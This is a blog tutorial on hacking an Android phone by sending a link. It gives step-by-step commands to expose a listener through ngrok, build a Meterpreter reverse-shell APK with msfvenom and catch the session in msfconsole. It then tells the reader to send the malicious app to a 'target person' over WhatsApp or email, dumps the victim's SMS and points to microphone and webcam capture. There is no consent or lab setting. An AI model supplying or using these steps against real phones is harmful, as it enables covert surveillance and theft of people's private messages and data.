How to Hack Android Phone by Sending Link


How to Hack Android Phone by Sending a Link

Table of Content

  • What is ngrok and How does it work?
  • What is Metasploit Framework?
  • What is MSFvenom in Metasploit?
  • Hack Android Phone by Sending a Link?
  • make undetectable payload for android?

What is ngrok and How does it work?

Ngrok is an open-source and free tool that runs like a server. It allows each person to expose a local webserver running on your local machine to the Internet. The ngrok servers have a fixed period. To access it, you will need a ngrok authtoken, which is available on the ngrok website.


ngrok authtoken

Remember you must have a ngrok account only then you can get the authentication code.

The ngrok server runs on the default port 80. If you want to use another TCP port, dig much deeper into a ngrok server. To get more knowledge about the ngrok server, Read this blog till the end.

We will download the ngrok server for Android Hacking, follow the below link.


Download ngrok application


What is Metasploit Framework?

The Metasploit framework is a popular and powerful hacking tool, which is pre-installed in Kali Linux. As you may have noticed, Over the past few years, several exploits frameworks have been developed, such as the Metasploit framework. It is often used to create shellcode payloads, such as Reverse shell, Bind shell.

The Metasploit framework contains several development tools geared toward exploit development and uses. If you want to Hack an Android phone by sending a link, you should use the Metasploit framework. As you know, we have mentioned above. The Metasploit framework contains several hacking exploits.


Metasploit Framework

MSF Features:

  • Information Gathering – (Active and Passive Info Gathering)
  • Exploit Development – (Reverse shell, BInd shell, Android Hacking)
  • Post Exploitation – (Bypass UAC, Cookies Stealing, Session Hijacking)
  • Client-Side Attack – (Make Android Payload, Hacking Virus, Vulnerable Version)


What is msfvenom in Metasploit?

Msfvenom is a payload generator and encoder tool, which comes with a Metasploit Framework. It could help us generate various payloads, such as ASP, VBScript, Java, War, Exe, APK, Elf.

Metasploit man page

Hack Android Phone by Sending a Link?

To Hack Android phones by sending a link, we need a public IP address and port. But we will use the ngrok public “IP Address and Port,” which is free and active for 7 or 8 hours.

“You must have noticed that certain malicious applications demand money for android hacking.”

We have mentioned above about the ngrok tool, some topics we have not carried like port forwarding. Let’s follow the below command.

./ngrok --help 
  • ngrok http 80
  • ngrok http pentestblog.in 8080
ngrok man page

We would generate a public IP address and port using the ngrok tool. It may take some time. Till then, be patient. Let’s follow the below command.

./ngrok tcp 8081

Wow, our attempt was successful, so we have got a public IP address and port. According to the below image, this is a TCP port used for android hacking. We have marked its public IP and port so that you can better understand it. Ngrok tool comes with both free and paid. We will use the free ngrok tool for Android hacking might be active for 7 to 8 hours only. Let’s take a closer look at the below image.

ngrok server status

Make undetectable payload for android

To hack an Android phone, we need a malicious payload. But we don’t know to make an undetectable payload for Android Hacking. “Don’t worry” In this stage, we will generate the malicious payload through MSF venom, which can be helpful for Android hacking. Let’s follow the below commands.

msfvenom -p android/meterpreter/reverse_tcp lhost=<ngrok-ip> lport=<ngrok-port> R > /path/
Make undetectable payload for android

In this stage, We will initiate the Metasploit Framework tool. As you know, we have created a malicious payload for Android hacking. To get more information, follow the below command.

msfconsole
Msfconsole Interface

We are moving towards the final stage. In this stage, we will set up the malicious payload for Android hacking in the Metasploit framework. It is an easy process. For that, you have to comprehend the below command.

Hacking Setup

In this stage, We will append the LHOST IP and LPORT port to the malicious payload. Let’s follow the below commands.

  • set LHOST <LocalHost IP>
  • set LPORT <LocalHost Port>

The show options command will display all the parameters required to run this module. Follow the below commands.

show options
Required Parameters

Once configured, This payload can successfully run. We will run the modules using the exploit command.

Successfully Run

Let’s send the malicious payload to your target person. For that, you can choose any social platform like WhatsApp, Email. It could depend on you, which method you use.
Suppose the target person has installed malicious applications by clicking on the link. Take a closer look at the below image.



According to the below image, the target person has fully hacked. We have spawned a meterpreter shell. The Meterpreter payload contains several post-exploitation features, such as uploads, contact_dump, record_mic, webcam.

We have dumped all sms list of the target person. Let’s follow the below commands.

dump_sms

Let’s look at the dumped Message. If you like this blog, then you can subscribe to our pentestblog YouTube channel. Share this blog with as many people as possible.


Rating: 5 out of 5.


Recent Posts



Most Popular Posts


4 Comments

Add a Comment

Your email address will not be published. Required fields are marked *